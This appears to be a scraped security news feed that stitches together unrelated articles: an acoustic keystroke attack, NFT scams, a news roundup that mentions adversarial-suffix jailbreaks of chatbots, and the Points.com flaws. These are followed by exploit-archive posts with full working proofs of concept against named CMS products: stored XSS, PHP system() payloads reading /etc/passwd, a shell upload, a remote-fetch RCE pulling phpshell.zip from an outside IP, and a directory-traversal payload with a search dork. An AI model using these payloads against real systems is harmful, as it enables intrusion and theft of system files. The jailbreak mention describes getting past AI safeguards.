A group of academics has devised a "deep learning-based acoustic side-channel attack" that can be used to classify laptop keystrokes that are recorded using a nearby phone with 95% accuracy.
"When trained on keystrokes recorded using the video conferencing software Zoom, an accuracy of 93% was achieved, a new best for the medium," researchers Joshua Harrison, Ehsan Toreini, and Maryam Mehrnezhad

Deep Learning / Endpoint Security

A group of academics has devised a "deep learning-based acoustic side-channel attack" that can be used to classify laptop keystrokes that are recorded using a nearby phone with 95% accuracy.

"When trained on keystrokes recorded using the video conferencing software Zoom, an accuracy of 93% was achieved, a new best for the medium," researchers Joshua Harrison, Ehsan Toreini, and Maryam Mehrnezhad said in a new study published last week.

Side-channel attacks refer to a class of security exploits that aim to glean insights from a system by monitoring and measuring its physical effects during the processing of sensitive data. Some of the common observable effects include runtime behavior, power consumption, electromagnetic radiation, acoustics, and cache accesses.

Although a completely side-channel-free implementation does not exist, practical attacks of this kind can have damaging consequences for user privacy and security as they could be weaponized by a malicious actor to obtain passwords and other confidential data.

"The ubiquity of keyboard acoustic emanations makes them not only a readily available attack vector, but also prompts victims to underestimate (and therefore not try to hide) their output," the researcher said. "For example, when typing a password, people will regularly hide their screen but will do little to obfuscate their keyboard's sound."

To pull off the attack, the researchers first carried out experiments in which 36 of the Apple MacBook Pro's keys were used (0-9, a-z), with each key being pressed 25 times in a row, varying in pressure and finger. This information was recorded both via a phone in close physical proximity to the laptop and Zoom.

The next phase entailed isolating the individual keystrokes and converting them into a mel-spectrogram, on which a deep learning model called CoAtNet (pronounced "coat" nets and short for convolution and self-attention networks) was run to classify the keystroke images.

As countermeasures, the researchers recommend typing style changes, using randomized passwords as opposed to passwords containing full words, and adding randomly generated fake keystrokes for voice call-based attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New 'Deep Learning Attack' Deciphers Laptop Keystrokes with 95% Accuracy

The U.S. Federal Bureau of Investigation (FBI) is warning about cyber crooks masquerading as legitimate non-fungible token (NFT) developers to steal cryptocurrency and other digital assets from unsuspecting users.
In these fraudulent schemes, criminals either obtain direct access to NFT developer social media accounts or create look-alike accounts to promote "exclusive" new NFT releases, often

Cyber Crime / Cryptocurrency

The U.S. Federal Bureau of Investigation (FBI) is warning about cyber crooks masquerading as legitimate non-fungible token (NFT) developers to steal cryptocurrency and other digital assets from unsuspecting users.

In these fraudulent schemes, criminals either obtain direct access to NFT developer social media accounts or create look-alike accounts to promote "exclusive" new NFT releases, often employing misleading advertising campaigns that create a sense of urgency to pull them off.

"Links provided in these announcements are phishing links directing victims to a spoofed website that appears to be a legitimate extension of a particular NFT project," the FBI said in an advisory last week.

The replica websites urge potential targets to connect their cryptocurrency wallets and purchase the NFT, only for the threat actors to siphon the funds and NFTs to wallets under their control.

"Contents stolen from victims' wallets are often processed through a series of cryptocurrency mixers and exchanges to obfuscate the path and final destination of the stolen NFTs," the agency said.

To mitigate the risks posed by such scams, it's recommended that users carry out due diligence and review social media accounts and websites to verify their legitimacy.

The development comes nearly five months after the FBI warned of a spike in bogus cryptocurrency investment schemes called pig butchering (or shā zhū pán), leading to losses of $2 billion in 2022.

This includes a category called CryptoRom in which criminals use fictitious identities on dating apps and social media platforms to develop romantic relationships and build trust with victims, before introducing the idea of trading cryptocurrencies.

The operators are known to engage in initial conversation within the app with which they made initial contact with the target. Soon after, the chat is moved to a private messaging app such as Telegram or WhatsApp, where they encourage them to use fraudulent crypto websites or apps and make substantial investments.

"Criminals coach victims through the investment process, show them fake profits, and encourage victims to invest more," the FBI said. "When victims attempt to withdraw their money, they are told they need to pay a fee or taxes. Victims are unable to get their money back, even if they pay the imposed fees or taxes."

The romance-centered social engineering attacks have also gotten a facelift in recent months, with Sophos identifying apps on the Apple App Store and Google Play Store that make use of generative AI features to lend more credibility to conversations with the victims on messaging apps like WhatsApp.

"These applications are able to get past review by Apple and Google by modifying remote content associated with the apps after they are approved and published to the stores," the cybersecurity company said.

"By simply changing a pointer in remote code, the app can be switched from a benign interface to a fraudulent one without further review by Apple or Google, unless a complaint is filed."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FBI Alert: Crypto Scammers are Masquerading as NFT Developers

Plus: A framework for encrypting social media, Russia-backed hacking through Microsoft Teams, and the Bitfinex Crypto Couple pleads guilty.

Between a cascade of indictments against former US president Donald Trump, a tumultuous 2024 election season (in which Trump is a main character), and the rapid rise of generative artificial intelligence, 2024 is shaping up to be a complete nightmare.

At the center of it will be a rise in personalized disinformation. Not only will there be more BS to sift through thanks to tools like ChatGPT and Google’s Bard, but the disinformation will likely be more effective, and even tailored to target specific groups with frightening consequences. Of course, some of this could be fixed with new regulations. But the US Congress still hasn’t figured out how to tackle privacy, and regulating AI will only be more difficult.

In addition to disinformation, people keep figuring out new ways to break through the guardrails that generative AI tools have in place to stop malicious activities. The latest is something called an “adversarial attack,” which researchers at Carnegie Mellon University found can be carried out simply by attaching a string of nonsense-looking instructions to the end of certain prompts entered into tools like ChatGPT. While it’s possible to block specific attack strings, nobody yet knows how to fix this flaw entirely.

AI might be the new frontier for security researchers. But regular ol’ platforms are still a wealth of terrible vulnerabilities. The latest is the Points platform, which provides the underlying tech for dozens of major travel rewards programs. Researchers recently discovered flaws in the Points API that exposed people’s private information. And a bug in a Points administrator website could have allowed an attacker to give themselves unlimited airline miles and hotel points. But don’t get any big ideas, hackers—all the flaws have since been fixed.

The Points bugs aren’t the only ones patched recently. If you use Apple iOS, Google Android, or Microsoft products, check our list of the recent security updates you’ll want to install right now.

But that’s not all. Each week, we round up the security and privacy stories we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

A single cloud firm has provided server space to at least 17 state-sponsored hacking groups from countries including China, Russia, and North Korea, according to researchers at security firm Halcyon. The firm, Cloudzy, also provided its cloud storage to state-backed hackers from Iran, India, Pakistan, and Vietnam, as well as two ransomware groups, researchers found. While Halcyon estimates that “roughly half” of Cloudzy’s business “was malicious,” according to Reuters, the company pins it at just 2 percent. But who's counting, really?

Renowned hacker crew Cult of the Dead Cow (cDc) has big plans for social media. No, they’re not launching another Twitter alternative (mercifully)—they’ve created a framework for encrypting social media, _The Washington Post_ reports. The networked application framework, dubbed Veilid, would give companies the ability to release encrypted versions of their apps, allowing users greater privacy protections against prying eyes. Veilid (pronounced vay-lid) will formally debut next week at the Def Con security conference in Las Vegas, and cDc promises “flagship apps available from the launch.”

Microsoft revealed this week that state-backed hackers linked to Russia carried out “highly targeted” phishing attacks through the company’s Teams platform. The hackers used previously compromised Microsoft 365 accounts “owned by small businesses” to create domains that were then used to dupe their targets through Microsoft Teams messages, “by engaging a user and eliciting approval of multifactor authentication (MFA) prompts,” Microsoft wrote. The hackers are believed to be part of a group widely known as APT29 or Cozy Bear, which Microsoft calls Midnight Blizzard. Western authorities say APT29 is part of Russia’s Foreign Intelligence Service (SVR). You might remember the group from such hits as 2020’s historic SolarWinds hack and 2016’s breach of the Democratic National Committee.

A couple arrested in 2022 for allegedly stealing and laundering $4.5 billion in bitcoin from the Bitfinex exchange pleaded guilty on Thursday to a variety of charges stemming from the 2016 hack. Ilya Lichtenstein admitted to hacking Bitfinex and pleaded guilty to a conspiracy to launder the ill-gotten fortune. His wife, Heather Rhiannon Morgan, also entered guilty pleas on charges of conspiracy to launder money and conspiracy to defraud the United States. Lichtenstein’s admission ends the mystery of who hacked the cryptocurrency exchange, which suffered from several security issues, according to an internal report obtained by the Organized Crime and Corruption Reporting Project and reviewed by WIRED. If convicted, Lichtenstein faces up to 20 years in prison, while Morgan could spend 10 years behind bars.

Security News This Week: The Cloud Company at the Center of a Global Hacking Spree

By Habiba Rashid
Cybersecurity researcher Sam Curry and his team managed to hack Points.com before malicious threat actors could.
This is a post from HackRead.com Read the original post: Globally Used Points.com Loyalty System Hacked for Good

**IN SUMMARY**

1.  **The flaws in Points.com were reported by InfoSec researcher Sam Curry.**
2.  **Points.com acts as a backend for multiple airline & hotel rewards programs.**
3.  **If hacked, scammers could’ve manipulated the loyalty progs on Points.com.**
4.  **Points.com has fixed the vulnerabilities, posing no current danger.**

In a recent discovery that raises concerns about the security of personal data in loyalty rewards systems, cybersecurity researchers have unveiled a series of security vulnerabilities within points.com, a widely used airline and hotel rewards platform.

The vulnerabilities, which were brought to light by **Sam Curry** and his team, could have potentially compromised the personal information of millions of customers.

Points.com, acting as a backend for numerous airline and hotel rewards programs, also functions as a platform for trading and redeeming loyalty points. The security researchers, including Ian Carroll and Shubham Shah, identified five distinct security flaws over a period of several months that could have allowed unauthorized access to sensitive user data, including names, addresses, emails, phone numbers, and transaction details.

(Image: Sam Curry)

According to Curry’s **blog post**, of particular concern was the possibility that these vulnerabilities could have facilitated the transfer of loyalty points between accounts. Additionally, attackers could have gained access to a global administrator website, thereby gaining the ability to issue points, manage loyalty programs, and execute various administrative actions, according to Sam Curry.

The researchers’ findings included an unauthenticated HTTP path traversal bug, discovered in early March, which could have provided access to an internal API containing over 22 million order records.

This database exposed a plethora of information, ranging from partial credit card numbers to customer authorization tokens. The flaws extended to an authorization bypass in a misconfigured API that could have been exploited to transfer rewards points from users.

The impact of these vulnerabilities was far-reaching, with one of the identified bugs affecting United Airlines. This specific flaw could allow an attacker to generate an authorization token for any user simply by possessing their rewards number and surname. As a result, an attacker could transfer miles to themselves and even authenticate as a member on various MileagePlus-related applications.

Access allowed researchers to gain thousands of dollars worth of points on United Airlines. (Image: Sam Curry)

Curry’s team also discovered weaknesses that impacted other partner businesses. A points.com-hosted Virgin rewards website was found to leak API authentication information, enabling an attacker to manipulate accounts and modify reward program settings.

Additionally, the researchers found a vulnerability involving the “Flask session secret” for the points.com global administration website, granting unauthorized access to crucial administrative functions.

Despite the concerning implications of these vulnerabilities, Curry praised points.com’s swift response to their reports. The platform’s security team promptly addressed each issue within approximately an hour of disclosure. Affected websites were taken offline for remediation before the vulnerabilities were successfully patched.

**More Hacks from Sam Curry**

1.  Automotive Industry Exposed to Have Major API Vulnerabilities
2.  Vulnerability in Chess.com allowed access to 50M user records
3.  Honda & Nissan Cars App Flaws: Hack by Knowing VIN Number
4.  55 Apple vulnerabilities risked iCloud account takeover, data theft

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Globally Used Points.com Loyalty System Hacked for Good

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Ubuntu Security Notice 6272-1 - Motoyasu Saburi discovered that OpenJDK 20 incorrectly handled special characters in file name parameters. An attacker could possibly use this issue to insert, edit or obtain sensitive information. Eirik Bjørsnøs discovered that OpenJDK 20 incorrectly handled certain ZIP archives. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6272-1  
August 03, 2023

openjdk-20 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in OpenJDK 20.

Software Description:  
- openjdk-20: Open Source Java implementation

Details:

Motoyasu Saburi discovered that OpenJDK 20 incorrectly handled special  
characters in file name parameters. An attacker could possibly use  
this issue to insert, edit or obtain sensitive information.  
(CVE-2023-22006)

Eirik Bjørsnøs discovered that OpenJDK 20 incorrectly handled certain ZIP  
archives. An attacker could possibly use this issue to cause a denial  
of service. (CVE-2023-22036)

David Stancu discovered that OpenJDK 20 had a flaw in the AES cipher  
implementation. An attacker could possibly use this issue to obtain  
sensitive information. (CVE-2023-22041)

Zhiqiang Zang discovered that OpenJDK 20 incorrectly handled array accesses  
when using the binary '%' operator. An attacker could possibly use this  
issue to obtain sensitive information. (CVE-2023-22044)

Zhiqiang Zang discovered that OpenJDK 20 incorrectly handled array accesses.  
An attacker could possibly use this issue to obtain sensitive information.  
(CVE-2023-22045)

It was discovered that OpenJDK 20 incorrectly sanitized URIs strings. An  
attacker could possibly use this issue to insert, edit or obtain sensitive  
information. (CVE-2023-22049)

It was discovered that OpenJDK 20 incorrectly handled certain glyphs. An  
attacker could possibly use this issue to cause a denial of service.  
(CVE-2023-25193)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  openjdk-20-jdk                  20.0.2+9+ds1-0ubuntu1~23.04  
  openjdk-20-jre                  20.0.2+9+ds1-0ubuntu1~23.04  
  openjdk-20-jre-headless         20.0.2+9+ds1-0ubuntu1~23.04  
  openjdk-20-jre-zero             20.0.2+9+ds1-0ubuntu1~23.04

This update uses a new upstream release, which includes additional  
bug fixes. After a standard system update you need to restart any  
Java applications or applets to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6272-1  
  CVE-2023-22006, CVE-2023-22036, CVE-2023-22041, CVE-2023-22044,  
  CVE-2023-22045, CVE-2023-22049, CVE-2023-25193

Package Information:  
  https://launchpad.net/ubuntu/+source/openjdk-20/20.0.2+9+ds1-0ubuntu1~23.04

Ubuntu Security Notice USN-6272-1

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

  
Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html  
Extension management at, download location for plugin list  
  
Click on any plugin of the cloud plugin to download  
Burp Suite Packet capture  
  
Can test parameters download\_url  
  
VPS enables HTTP service  
  
Zip compress phpshell.php and upload to VPS  
  
  
  
Successfully caused any file download  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 86  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=start-download&filepath=jzdesign&download\_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:  
Global search for start-download to determine the location of file vulnerabilities  
The vulnerability is located in /A/c/PluginsController.php  
  
  
Line 739 starts with a case statement, followed by an fwrite write operation  
  
Located on line 718, its controllable point is $download\_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in  
  
Starting from line 883, it is the default file download URL, but causing a change after the controllable $download\_url on line 891, resulting in the vulnerability function being curl\_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement 'file-upzip' on line 776  
  
It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get\_zip\_orginalsize to start decompression work  
  
While loop to extract each file  
  
Successfully decompressed  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 32  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php  
  
Successfully executing command causing RCE

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE  vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Tag

#apple